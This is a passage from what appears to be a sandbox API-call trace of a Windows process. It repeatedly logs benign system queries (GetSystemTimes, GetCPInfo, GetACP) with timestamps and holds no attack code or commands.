lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.991] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.991] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.991] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.992] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.992] GetACP () returned 0x4e4 [0128.992] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.993] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.993] GetACP () returned 0x4e4 [0128.993] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.994] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.994] GetACP () returned 0x4e4 [0128.994] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.995] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.995] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.995] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.996] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.996] GetACP () returned 0x4e4 [0128.996] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.997] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.997] GetACP () returned 0x4e4 [0128.997] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.998] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.998] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.998] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0128.999] GetACP () returned 0x4e4 [0128.999] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0128.999] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.000] GetACP () returned 0x4e4 [0129.000] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.000] GetACP () returned 0x4e4 [0129.000] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.000] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.000] GetACP () returned 0x4e4 [0129.000] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.001] GetACP () returned 0x4e4 [0129.001] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.001] GetACP () returned 0x4e4 [0129.001] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.001] GetACP () returned 0x4e4 [0129.001] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.001] GetACP () returned 0x4e4 [0129.001] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.001] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.001] GetACP () returned 0x4e4 [0129.001] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.002] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.002] GetACP () returned 0x4e4 [0129.002] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0129.003] GetACP () returned 0x4e4 [0129.003] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0129.003] GetCPInfo (in: 